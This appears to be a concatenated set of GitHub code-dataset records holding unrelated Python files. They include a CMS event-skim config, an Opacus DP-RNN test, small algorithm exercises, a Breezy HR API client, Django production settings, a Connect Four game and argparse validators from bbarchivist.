Selection\n### Comment out for the timing being assuming running on secondary dataset with trigger bit selected already\nimport HLTrigger.HLTfilters.hltHighLevel_cfi\nprocess.hltHF = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()\nprocess.hltHF.HLTPaths = ['HLT_PAHFSumET*_v*']\nprocess.hltHF.andOr = cms.bool(True)\nprocess.hltHF.throw = cms.bool(False)\n\nprocess.eventFilter_HF = cms.Sequence(\n process.hltHF *\n process.PAcollisionEventSelection *\n process.pAHighMultiplicityPileUpFilter_2Sigma_mode1\n)\nprocess.eventFilter_HF_step = cms.Path( process.eventFilter_HF )\nprocess.extraTrks_HF_step = cms.Path( process.eventFilter_HF * process.ppSingleTrackFilterSequence )\n\nprocess.pACentrality_step = cms.Path( process.eventFilter_HF * process.pACentrality)\nprocess.pACentrality.producePixelhits = False\n\nprocess.load(\"davidlw.HighPtFlow2011.ppanalysisSkimContentFull_cff\")\nprocess.output_HF = cms.OutputModule(\"PoolOutputModule\",\n outputCommands = process.analysisSkimContent.outputCommands,\n fileName = cms.untracked.string('pPb_HF.root'),\n SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('eventFilter_HF_step')),\n dataset = cms.untracked.PSet(\n dataTier = cms.untracked.string('AOD'),\n filterName = cms.untracked.string('pPb_HF'))\n)\n\nprocess.output_HF_step = cms.EndPath(process.output_HF)\n\nprocess.schedule = cms.Schedule(\n process.eventFilter_HF_step,\n process.extraTrks_HF_step,\n process.pACentrality_step,\n process.output_HF_step,\n)\n","repo_name":"davidlw/RiceHIG","sub_path":"Skim2013/test/pPbFlowCorrSkim_trigger2013_HFHM_singlefile_cfg.py","file_name":"pPbFlowCorrSkim_trigger2013_HFHM_singlefile_cfg.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71343563471","text":"from typing import Optional, Tuple, Union\n\nimport hypothesis.strategies as st\nimport torch\nimport torch.nn as nn\nfrom hypothesis import given, settings\nfrom opacus.layers import DPGRU, DPLSTM, DPRNN\nfrom opacus.utils.packed_sequences import _gen_packed_data\nfrom torch.nn.utils.rnn import PackedSequence\n\nfrom .common import DPModules_test\n\n\ndef rnn_train_fn(\n model: nn.Module,\n x: Union[torch.Tensor, PackedSequence],\n state_init: Optional[Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]] = None,\n):\n model.train()\n criterion = nn.MSELoss()\n logits, _ = model(x, state_init)\n if isinstance(logits, PackedSequence):\n y = torch.zeros_like(logits[0])\n loss = criterion(logits[0], y)\n else:\n y = torch.zeros_like(logits)\n loss = criterion(logits, y)\n loss.backward()\n\n\nclass DPLSTM_test(DPModules_test):\n @given(\n mode=st.one_of(st.just(\"rnn\"), st.just(\"gru\"), st.just(\"lstm\")),\n batch_size=st.integers(1, 5),\n seq_len=st.integers(1, 6),\n emb_size=st.integers(5, 10),\n hidden_size=st.integers(3, 7),\n num_layers=st.integers(1, 3),\n bidirectional=st.booleans(),\n bias=st.booleans(),\n batch_first=st.booleans(),\n zero_init=st.booleans(),\n packed_input_flag=st.integers(0, 2),\n )\n @settings(deadline=20000)\n def test_rnn(\n self,\n mode: str,\n batch_size: int,\n seq_len: int,\n emb_size: int,\n hidden_size: int,\n num_layers: int,\n bidirectional: bool,\n bias: bool,\n batch_first: bool,\n zero_init: bool,\n packed_input_flag: int,\n ):\n use_cn = False\n if mode == \"rnn\":\n original_rnn_class = nn.RNN\n dp_rnn_class = DPRNN\n elif mode == \"gru\":\n original_rnn_class = nn.GRU\n dp_rnn_class = DPGRU\n elif mode == \"lstm\":\n original_rnn_class = nn.LSTM\n dp_rnn_class = DPLSTM\n use_cn = True\n else:\n raise ValueError(\"Invalid RNN mode\")\n\n rnn = original_rnn_class(\n emb_size,\n hidden_size,\n num_layers=num_layers,\n batch_first=batch_first,\n bidirectional=bidirectional,\n bias=bias,\n )\n dp_rnn = dp_rnn_class(\n emb_size,\n hidden_size,\n num_layers=num_layers,\n batch_first=batch_first,\n bidirectional=bidirectional,\n bias=bias,\n )\n\n dp_rnn.load_state_dict(rnn.state_dict())\n\n # Packed sequences not happy with deterministic\n torch.use_deterministic_algorithms(False)\n if packed_input_flag == 0:\n # no packed sequence input\n x = (\n torch.randn([batch_size, seq_len, emb_size])\n if batch_first\n else torch.randn([seq_len, batch_size, emb_size])\n )\n elif packed_input_flag == 1:\n # packed sequence input in sorted order\n x = _gen_packed_data(\n batch_size, seq_len, emb_size, batch_first, sorted_=True\n )\n elif packed_input_flag == 2:\n # packed sequence input in unsorted order\n x = _gen_packed_data(\n batch_size, seq_len, emb_size, batch_first, sorted_=False\n )\n else:\n raise ValueError(\"Invalid packed input flag\")\n torch.use_deterministic_algorithms(True)\n\n if zero_init:\n self.compare_forward_outputs(\n rnn,\n dp_rnn,\n x,\n output_names=(\"out\", \"hn\", \"cn\") if use_cn else (\"out\", \"hn\"),\n atol=1e-5,\n rtol=1e-3,\n )\n\n self.compare_gradients(\n rnn,\n dp_rnn,\n rnn_train_fn,\n x,\n atol=1e-5,\n rtol=1e-3,\n )\n\n else:\n num_directions = 2 if bidirectional else 1\n h0 = torch.randn([num_layers * num_directions, batch_size, hidden_size])\n c0 = torch.randn([num_layers * num_directions, batch_size, hidden_size])\n self.compare_forward_outputs(\n rnn,\n dp_rnn,\n x,\n (h0, c0) if use_cn else h0,\n output_names=(\"out\", \"hn\", \"cn\") if use_cn else (\"out\", \"hn\"),\n atol=1e-5,\n rtol=1e-3,\n )\n self.compare_gradients(\n rnn,\n dp_rnn,\n rnn_train_fn,\n x,\n (h0, c0) if use_cn else h0,\n atol=1e-5,\n rtol=1e-3,\n )\n","repo_name":"pytorch/opacus","sub_path":"opacus/tests/dp_layers/dp_rnn_test.py","file_name":"dp_rnn_test.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":1515,"dataset":"github-code","pt":"83"} +{"seq_id":"32783341545","text":"# Keypad values are for demo. You can add values from 0 to 9 (as it is there in keypad phones).\nkeypad = {\n '1':'abc',\n '2': 'de',\n '3': 'fghi'\n}\n\ndef kpCombo(number):\n if len(number) == 0:\n return [\"\"]\n \n head = keypad[number[0]]\n apka_ans = kpCombo(number[1:])\n mera_ans = []\n for letter in head:\n for element in apka_ans:\n mera_ans.append(letter+element)\n \n return mera_ans \n \nprint(kpCombo(\"123\"))\n","repo_name":"Micekey/DSA","sub_path":"Get Keypad Combination (Recursion).py","file_name":"Get Keypad Combination (Recursion).py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"39238779424","text":"from consts import MOCK_CLASS_SIZE, MOCK_EXAM_LENGTH\nfrom models import ScoreTable, Examination\nfrom data_operator import VirtualBaseData, IRTEstimate\nimport numpy as np\n\nif __name__ == \"__main__\":\n\n # 生成mock数据\n test_data_obj = VirtualBaseData(MOCK_CLASS_SIZE, MOCK_EXAM_LENGTH)\n\n # 生成基础信息\n score_table = ScoreTable(\n test_data_obj.virtual_exam_paper_info_array,\n test_data_obj.virtual_exam_people_score_info_array,\n )\n\n # 创建本次考试\n examination = Examination(score_table)\n\n # 筛选一下零分和满分\n examination.update_state_at_first()\n\n # 估计一下试试\n test_estimate = IRTEstimate(\n examination.score_array_for_estimate,\n np.array(test_data_obj.virtual_student_abilities_list)[examination.effective_student_index],\n np.array(test_data_obj.virtual_question_difficulties_list)[examination.effective_question_index],\n )\n test_estimate.merge_approach()\n","repo_name":"xuqiushi/IRTEstimate","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41929156021","text":"import pytest\n\nimport xtgeo\n\n\n@pytest.fixture()\ndef string_to_well(setup_tmpdir):\n def wrapper(wellstring, **kwargs):\n \"\"\"It is currently not possible to initiate from spec.\n We work around by dumping to csv before reloading\n \"\"\"\n fpath = \"well_data.rmswell\"\n with open(fpath, \"w\") as fh:\n fh.write(wellstring)\n\n return xtgeo.well_from_file(fpath, **kwargs)\n\n yield wrapper\n","repo_name":"equinor/xtgeo","sub_path":"tests/test_well/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"83"} +{"seq_id":"70533277711","text":"from typing import List\nclass SplitArrayToMinimizeMaxSum:\n def splitArray(self, nums: List[int], m: int) -> int:\n def cannot_split(max_sum, m):\n num_cuts, curr_sum = 0, 0\n for x in nums:\n curr_sum += x\n if curr_sum > max_sum:\n num_cuts += 1\n curr_sum = x\n return num_cuts >= m\n\n low, high = max(nums), sum(nums)\n while low < high:\n guess = low + (high - low) // 2\n if cannot_split(guess, m):\n low = guess + 1\n else:\n high = guess\n return low\n","repo_name":"alexwu2021/practice","sub_path":"Python/python3/leetcode/Hard/SplitArrayToMinimizeMaxSum.py","file_name":"SplitArrayToMinimizeMaxSum.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41739196293","text":"my_list = [\"Elie\", \"Tim\", \"Matt\"]\n\nanswer = [name[0] for name in my_list]\nprint(answer)\n\n# Second exercise\nlist_two = [1,2,3,4,5,6]\n\nanswer2 = [num for num in list_two if num % 2 == 0]\nprint(answer2)\n\n# Third exercise\nlist_three = [1,2,3,4]\nlist_four = [3,4,5,6]\n\nanswer3 = [num for num in [1,2,3,4] if num in [3,4,5,6]]\nprint(answer3)\n\n# Fourth exercise\nlist_five = [\"Elie\", \"Tim\", \"Matt\"]\n\nanswer4 = [name[::-1].lower() for name in list_five]\nprint(answer4)","repo_name":"amandathedev/Python-Exercises","sub_path":"list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40764819031","text":"def permutation(elements):\n if len(elements) == 1:\n return elements\n else:\n new_res = []\n for p in range(len(elements)):\n temp = elements[:p] + elements[p+1:]\n result = permutation(temp)\n for item in result:\n new_res.append(elements[p] + item)\n return new_res\n\ndef permute2(nums):\n if len(nums) == 0:\n return []\n elif len(nums) == 1:\n return [[nums[0]]]\n\n res = []\n insert = [nums[0]]\n small = self.permute2(nums[1:])\n\n for item in small:\n for i in range(len(item) + 1):\n res.append(item[:i] + insert + item[i:])\n\n return res\n\ndef permute3(items):\n from itertools import permutations\n\n return list(permutations(items, len(items)))\n\n\nif __name__ == '__main__':\n e = [str(i) for i in range(3)]\n r = permutation(e)\n print(r)\n","repo_name":"Zesunlight/Experiment","sub_path":"Python-Learning/Full_Permutation.py","file_name":"Full_Permutation.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"34704297367","text":"with open(\"test.txt\") as f:\n\ta = f.read().strip().split(\"\\n\\n\")\n\tall_answers = [x.replace(\"\\n\",\"\") for x in a]\n\t#lines = [line.rstrip() for line in f]\nprint(all_answers)\n\nform_set = \"abcdefghijklmnopqrstuvwxyz\"\ndef customCustoms(all_answers):\n\tresult = 0\n\tfor group_answers in all_answers:\n\t\tset_answers = set(\"\".join(group_answers))\n\t\tresult+=len(set_answers)\n\treturn result\nresult = customCustoms(all_answers)\nprint(result)\n\n# def part2(b):\n# \tresult = 0\n# \tfor i in b:\n# \t\tgroups = i.split(\" \")\n# \t\ti = i.replace(\" \",\"\")\n# \t\tanswers = {}\n# \t\tfor char in i:\n# \t\t\tif(char in answers):\n# \t\t\t\tanswers[char] += 1\n# \t\t\telse:\n# \t\t\t\tanswers[char] = 1\n\t\t\n# \t\tnum_groups = len(groups)\n# \t\tfor k, v in answers.items():\n# \t\t\tif(v == num_groups):\n# \t\t\t\tresult+=1\n# \t\t#print(num_groups, answers)\n\n# \treturn result\n\n# result = part2(b)\n# print(result)","repo_name":"Marvinho/Advent-of-Code","sub_path":"2020/day06/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43137861702","text":"import requests\nimport yaml\nimport json\nfrom time import sleep\n\n\nclass BreezyError(Exception):\n pass\n\n\nclass BreezyAPI:\n API_URL = \"https://api.breezy.hr/v3/\"\n\n def __init__(self):\n with open('auth.yaml', 'r') as file:\n config = yaml.safe_load(file)\n self.email = config['email']\n self.password = config['password']\n self.token = self._get_token()\n\n def call(self, endpoint: str, method: str = 'GET', params: dict = None,\n data: dict = None) -> dict:\n assert method in ['GET', 'POST', 'PUT'], 'Wrong method provided'\n while True:\n # jsonify data if using POST/PUT methods\n if method != 'GET':\n data = json.dumps(data)\n\n response = requests.request(\n method,\n self.API_URL + endpoint,\n headers={\n \"Authorization\": self.token,\n \"Accept\": \"*/*\",\n \"accept-encoding\": \"gzip, deflate\",\n \"content-type\": \"application/json\"\n },\n params=params,\n data=data\n )\n if response.status_code == 401:\n print('Status code 401, getting new token')\n self.token = self._get_token()\n elif response.status_code == 429:\n print('Exceeded API rate limit, sleeping 10 seconds')\n sleep(10)\n elif response.status_code == 200:\n return response.json()\n elif response.status_code == 204:\n return None\n elif response.status_code == 500:\n raise BreezyError(response.json()['error'])\n elif response.status_code == 504:\n print('504 error, sleeping 30 seconds')\n sleep(30)\n else:\n raise Exception(f'response code: {response.status_code}\\n'\n f'response text: {response.text}')\n\n def _get_token(self) -> str:\n token = requests.post(\n self.API_URL + \"signin\",\n data={\"email\": self.email, \"password\": self.password}\n )\n if token.status_code != 200:\n raise BreezyError('Error obtaining token\\nError '\n f'{token.status_code} > '\n f'{token.json()}')\n return token.json()['access_token']\n","repo_name":"guidovalente/Breezy-API","sub_path":"breezy.py","file_name":"breezy.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5065223704","text":"N,M = map(int, input().split())\narr = []\nans = ''\ntotal_hamming = 0\n\nfor i in range(N):\n arr.append(input())\n\nfor i in range(M):\n\n dic = {}\n for j in range(N):\n \n if arr[j][i] not in dic:\n dic[arr[j][i]] = 1\n\n else:\n dic[arr[j][i]] += 1\n\n dic_list = list(dic.items())\n dic_list = sorted(dic_list, key = lambda x : (-x[1], x[0]))\n \n ans += dic_list[0][0]\n total_hamming += N - dic_list[0][1]\n\nprint(ans)\nprint(total_hamming)","repo_name":"gusdn3477/Algorithm_Study","sub_path":"baekjoon/1000~2999/1969_DNA.py","file_name":"1969_DNA.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38600894254","text":"#!/usr/bin/env python\nimport subprocess\nimport sys\n\n# Run the 'fprettify command with the same command line parameters\nnew_command = ['fprettify'] + sys.argv[1:]\n# We put everything on one stream otherwise we should use threads\n# to check and avoid locks\nproc = subprocess.Popen(new_command, \n stdout=subprocess.PIPE, stderr=subprocess.STDOUT) \n# Get stdout and stderr\nouts, _ = proc.communicate()\n# I write anyway to stderr\nif outs is not None:\n if hasattr(sys.stderr, 'buffer'): # for Py3\n sys.stderr.buffer.write(outs)\n else:\n sys.stderr.write(outs)\n\n# Return non-zero if there is any output. Replicate output\n# (Note that output is printed as it comes)\nretcode = proc.returncode\nif retcode == 0 and outs:\n retcode = 200\n \nsys.exit(retcode)\n","repo_name":"optados-developers/optados","sub_path":"optados/test-suite/tools/fprettify-wrapper.py","file_name":"fprettify-wrapper.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"83"} +{"seq_id":"31570942406","text":"from .base import *\n\nfrom decouple import Csv, config\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = config('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = config('DEBUG', default=False, cast=bool)\n\nALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': config('DB_NAME'),\n 'USER': config('DB_USER'),\n 'PASSWORD': config('DB_PASSWORD'),\n 'HOST': config('DB_HOST'),\n 'PORT': config('DB_PORT'),\n }\n}\n\n\n# Rest Api\n\nREST_FRAMEWORK['DEFAULT_RENDERER_CLASSES'] = (\n 'rest_framework.renderers.JSONRenderer',\n)\n\n\n# Email - Mailgun\n\nEMAIL_HOST = 'smtp.eu.mailgun.org'\nEMAIL_PORT = 587\nEMAIL_HOST_USER = config('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD')\nEMAIL_USE_TLS = True\n\n\n# Cookies\n\nCSRF_COOKIE_SECURE = True\nSESSION_COOKIE_SECURE = True\n\n\n# Python social auth\n\nSOCIAL_AUTH_GITHUB_KEY = config('SOCIAL_AUTH_GITHUB_KEY')\nSOCIAL_AUTH_GITHUB_SECRET = config('SOCIAL_AUTH_GITHUB_SECRET')\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = config('SOCIAL_AUTH_GOOGLE_OAUTH2_KEY')\nSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = config('SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET')\n\n# Sentry \n\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nsentry_sdk.init(\n dsn=\"https://ba59b807fba94d9680144eb6bc86e9f1@o318909.ingest.sentry.io/5242620\",\n integrations=[DjangoIntegration()],\n\n # If you wish to associate users to errors (assuming you are using\n # django.contrib.auth) you may enable sending PII data.\n send_default_pii=True\n)\n\n\n# S3\n\nAWS_ACCESS_KEY_ID = config('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = config('AWS_SECRET_ACCESS_KEY')\nAWS_STORAGE_BUCKET_NAME = config('AWS_STORAGE_BUCKET_NAME')\n\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nAWS_S3_REGION_NAME = 'eu-west-2'\n\n\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\nAWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl': 'max-age=31536000',\n}\nAWS_LOCATION = 'static'\n\nSTATIC_URL = 'https://%s/%s/' % (AWS_S3_CUSTOM_DOMAIN, AWS_LOCATION)\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'","repo_name":"maxamuss/code-atlas","sub_path":"codeatlas/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"83"} +{"seq_id":"678917851","text":"import numpy as np\nimport random\nfrom player import ConnectPlayer\n# from connect_nn import NNAction, AlphaZeroNN\nfrom collections import Counter\nfrom human_play import HumanPlay\n\n\nclass ConnectFourGame:\n def __init__(self, nn_a=None, nn_b=None):\n self.board = np.zeros((6, 7))\n self.player_list = [ConnectPlayer('a', 1, nn_a), ConnectPlayer('b', 2, nn_b)]\n random.shuffle(self.player_list)\n # self.player_list[0].counter = 1\n # self.player_list[1].counter = 2\n self.player_turn = [1, 0]\n self.grid_increase = [(1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0), (-1, -1), (0, -1), (1, -1)]\n self.grid_increase = [np.array(i) for i in self.grid_increase]\n\n def action_board(self, action, counter):\n for i in range(6):\n if self.board[5 - i, action] == 0:\n self.board[5 - i, action] = counter\n break\n\n def grid_check(self, start_pos, counter):\n consecutive_counter = 1\n if self.board[start_pos] != counter:\n return False\n for grid in self.grid_increase:\n for i in range(1, 4):\n current_pos = tuple(np.array(start_pos) + i * grid)\n if current_pos[0] < 0 or current_pos[1] < 0:\n consecutive_counter = 1\n break\n try:\n if self.board[current_pos] == counter:\n consecutive_counter += 1\n else:\n consecutive_counter = 1\n break\n if consecutive_counter == 4:\n return True\n except Exception as e:\n # print(e)\n consecutive_counter = 1\n break\n return False\n\n def identify_win(self, counter):\n for row in range(6):\n for column in range(7):\n if self.grid_check((5 - row, 6 - column), counter):\n return True\n return False\n\n def run_game(self):\n four_row = False\n player_turn = 0\n player = None\n while not four_row:\n player = self.player_list[player_turn]\n action = player.action(self.board)\n self.action_board(action, player.counter)\n four_row = self.identify_win(player.counter)\n player_turn = self.player_turn[player_turn]\n if np.count_nonzero(self.board) == 42:\n break\n # print(self.board)\n if np.count_nonzero(self.board) == 42:\n return 'draw'\n else:\n return player\n\n def check_end(self, state, counter):\n self.board = state\n opponent_counter = 1 if counter == 2 else 2\n if self.identify_win(counter):\n return 1\n if self.identify_win(opponent_counter):\n return -1\n else:\n return 0\n\n\n\n\nclass HumanGame:\n def __init__(self, nn_class, human_play):\n self.nn_a = nn_class(load_filepath='q_model.h5', epsilon=0)\n self.b_human = human_play()\n self.game = None\n\n def run_game(self):\n self.game = ConnectFourGame(self.nn_a, self.b_human)\n self.game.run_game()\n\n\n\n# if __name__ == '__main__':\n# # rl = MultipleGames(NNAction)\n# # rl.simulate_many_games(100000)\n#\n# rl = AlphaZero()\n# rl.iterate_models()\n\n # rl = HumanGame(NNAction, HumanPlay)\n # rl.run_game()\n","repo_name":"SharedModels/ConnectFour","sub_path":"base_game.py","file_name":"base_game.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31482140130","text":"import torch.nn as nn\n\n\nclass MyNet(nn.Module):\n def __init__(self):\n super(MyNet, self).__init__()\n\n # Convolutional layers\n self.conv_layers = nn.Sequential (\n\n # First convolutional layer\n nn.Conv2d(in_channels=3, out_channels=6, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_features=6),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n # Second convolutional layer\n nn.Conv2d(in_channels=6, out_channels=12, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_features=12),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n # Third convolutional layer\n nn.Conv2d(in_channels=12, out_channels=24, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_features=24),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n )\n\n # Fully connected layers\n self.fc_layers = nn.Sequential (\n\n # Dropout layer\n nn.Dropout(p=0.1),\n\n # First fully connected layer\n nn.Linear(in_features=24 * 4 * 4, out_features=192),\n nn.ReLU(inplace=True),\n\n # Second fully connected layer\n nn.Linear(in_features=192, out_features=96),\n nn.ReLU(inplace=True),\n\n # Third fully connected layer\n nn.Linear(in_features=96, out_features=10),\n )\n\n\n def forward(self, x):\n\n # Convolutional layers\n x = self.conv_layers(x)\n\n # Flatten\n x = x.view(-1, 24 * 4 * 4)\n\n # Fully connected layers\n x = self.fc_layers(x)\n\n return x\n","repo_name":"vincentfpgarcia/from-pytorch-to-coreml","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"83"} +{"seq_id":"74759857871","text":"N = int(input())\ncows = input()\n\ncount = 0\nflag = False\n\nblanks = []\n\nfor i in range(N):\n if cows[i] == \"0\":\n flag = True\n count += 1\n\n if (cows[i] == \"1\" or i == N-1) and flag:\n blanks.append(count+1)\n flag = False\n count = 0\n\n# One empty chain\nif len(blanks) == 1:\n if cows[0] == cows[-1] == \"1\":\n print(blanks[0] // 3)\n elif cows[0] == \"1\" or cows[-1] == \"1\":\n print(blanks[0] // 2)\n else:\n print(blanks[0] - 2)\n\n# Two empty chains\nelif len(blanks) == 2:\n if cows[0] == cows[-1] == \"0\":\n print(min(blanks[0]-1, blanks[1]-1))\n else:\n print(min(blanks[0]//2, blanks[0]//2))\n\n# More than 2 empty chains\nelse:\n dists = []\n\n # Case 1: (right, max1) and (left, max2)\n if blanks[-1] != max(blanks) and blanks[0] != max(blanks):\n b = blanks.copy()\n if cows[-1] == \"1\":\n b[b.index(max(b))] = max(b) // 2\n b[-1] //= 2\n dists.append(min(b))\n elif cows[-1] == \"0\":\n b[b.index(max(b))] = max(b) // 2\n b.pop(-1)\n dists.append(min(b))\n\n b = blanks.copy()\n if cows[0] == \"1\":\n b[b.index(max(b))] = max(b) // 2\n b[0] //= 2\n dists.append(min(b))\n elif cows[0] == \"0\":\n b[b.index(max(b))] = max(b) // 2\n b.pop(0)\n dists.append(min(b))\n\n # Case 2: (max1, max2), not including right and left\n b = blanks.copy()\n b.pop(0)\n b.pop(-1)\n\n if len(b) >= 4:\n b[b.index(max(b))] = max(b) // 2\n b[b.index(max(b))] = max(b) // 2\n dists.append(min(b))\n\n # Case 3: (right, left)\n b = blanks.copy()\n\n if cows[0] == \"1\" and cows[-1] == \"1\":\n b[0] //= 2\n b[-1] //= 2\n dists.append(min(b))\n elif cows[0] == \"0\" and cows[-1] == \"1\":\n b[-1] //= 2\n dists.append(min(b))\n elif cows[0] == \"1\" and cows[-1] == \"0\":\n b[0] //= 2\n dists.append(min(b))\n elif cows[0] == \"0\" and cows[-1] == \"0\":\n dists.append(min(b))\n\n # Case 4: (double)\n b = blanks.copy()\n b[b.index(max(b))] = max(b) // 3\n dists.append(min(b))\n\n print(max(dists))\n","repo_name":"Togohogo1/Programming-Problems","sub_path":"USACO/USACO_20_Open_B1_Social_Distancing_I.py","file_name":"USACO_20_Open_B1_Social_Distancing_I.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9475941386","text":"#!/usr/bin/env python3\n\"\"\"This module is used for argument utilities.\"\"\"\n\nimport argparse # argument parser for filters\nimport glob # file lookup\nimport os # path work\nimport subprocess # running cfp/cap\nimport sys # getattr\n\nfrom bbarchivist import bbconstants # constants\nfrom bbarchivist import utilities # version checking\n\n__author__ = \"Thurask\"\n__license__ = \"WTFPL v2\"\n__copyright__ = \"2018-2019 Thurask\"\n\n\ndef signed_file_args(files):\n \"\"\"\n Check if there are between 1 and 6 files supplied to argparse.\n\n :param files: List of signed files, between 1 and 6 strings.\n :type files: list(str)\n \"\"\"\n filelist = [file for file in files if file]\n if not 1 <= len(filelist) <= 6:\n raise argparse.ArgumentError(argument=None, message=\"Requires 1-6 signed files\")\n return files\n\n\ndef file_exists(file):\n \"\"\"\n Check if file exists, raise argparse error if it doesn't.\n\n :param file: Path to a file, including extension.\n :type file: str\n \"\"\"\n if not os.path.exists(file):\n raise argparse.ArgumentError(argument=None, message=\"{0} not found.\".format(file))\n return file\n\n\ndef positive_integer(input_int):\n \"\"\"\n Check if number > 0, raise argparse error if it isn't.\n\n :param input_int: Integer to check.\n :type input_int: str\n \"\"\"\n if int(input_int) <= 0:\n info = \"{0} is not >=0.\".format(str(input_int))\n raise argparse.ArgumentError(argument=None, message=info)\n return int(input_int)\n\n\ndef valid_method_poptxz(methodlist):\n \"\"\"\n Remove .tar.xz support if system is too old.\n\n :param methodlist: List of all methods.\n :type methodlist: tuple(str)\n \"\"\"\n if not utilities.new_enough(3, 3):\n methodlist = [x for x in bbconstants.METHODS if x != \"txz\"]\n return methodlist\n\n\ndef valid_method(method):\n \"\"\"\n Check if compression method is valid, raise argparse error if it isn't.\n\n :param method: Compression method to check.\n :type method: str\n \"\"\"\n methodlist = bbconstants.METHODS\n methodlist = valid_method_poptxz(methodlist)\n if method not in methodlist:\n info = \"Invalid method {0}.\".format(method)\n raise argparse.ArgumentError(argument=None, message=info)\n return method\n\n\ndef valid_carrier(mcc_mnc):\n \"\"\"\n Check if MCC/MNC is valid (1-3 chars), raise argparse error if it isn't.\n\n :param mcc_mnc: MCC/MNC to check.\n :type mcc_mnc: str\n \"\"\"\n if not str(mcc_mnc).isdecimal():\n infod = \"Non-integer {0}.\".format(str(mcc_mnc))\n raise argparse.ArgumentError(argument=None, message=infod)\n if len(str(mcc_mnc)) > 3 or not str(mcc_mnc):\n infol = \"{0} is invalid.\".format(str(mcc_mnc))\n raise argparse.ArgumentError(argument=None, message=infol)\n else:\n return mcc_mnc\n\n\ndef escreens_pin(pin):\n \"\"\"\n Check if given PIN is valid, raise argparse error if it isn't.\n\n :param pin: PIN to check.\n :type pin: str\n \"\"\"\n if len(pin) == 8:\n try:\n int(pin, 16) # hexadecimal-ness\n except ValueError:\n raise argparse.ArgumentError(argument=None, message=\"Invalid PIN.\")\n else:\n return pin.lower()\n else:\n raise argparse.ArgumentError(argument=None, message=\"Invalid PIN.\")\n\n\ndef escreens_duration(duration):\n \"\"\"\n Check if Engineering Screens duration is valid.\n\n :param duration: Duration to check.\n :type duration: int\n \"\"\"\n if int(duration) in (1, 3, 6, 15, 30):\n return int(duration)\n else:\n raise argparse.ArgumentError(argument=None, message=\"Invalid duration.\")\n\n\ndef droidlookup_hashtype(method):\n \"\"\"\n Check if Android autoloader lookup hash type is valid.\n\n :param method: None for regular OS links, \"sha256/512\" for SHA256 or 512 hash.\n :type method: str\n \"\"\"\n if method.lower() in (\"sha512\", \"sha256\"):\n return method.lower()\n else:\n raise argparse.ArgumentError(argument=None, message=\"Invalid type.\")\n\n\ndef droidlookup_devicetype(device):\n \"\"\"\n Check if Android autoloader device type is valid.\n\n :param device: Android autoloader types to check.\n :type device: str\n \"\"\"\n devices = (\"Priv\", 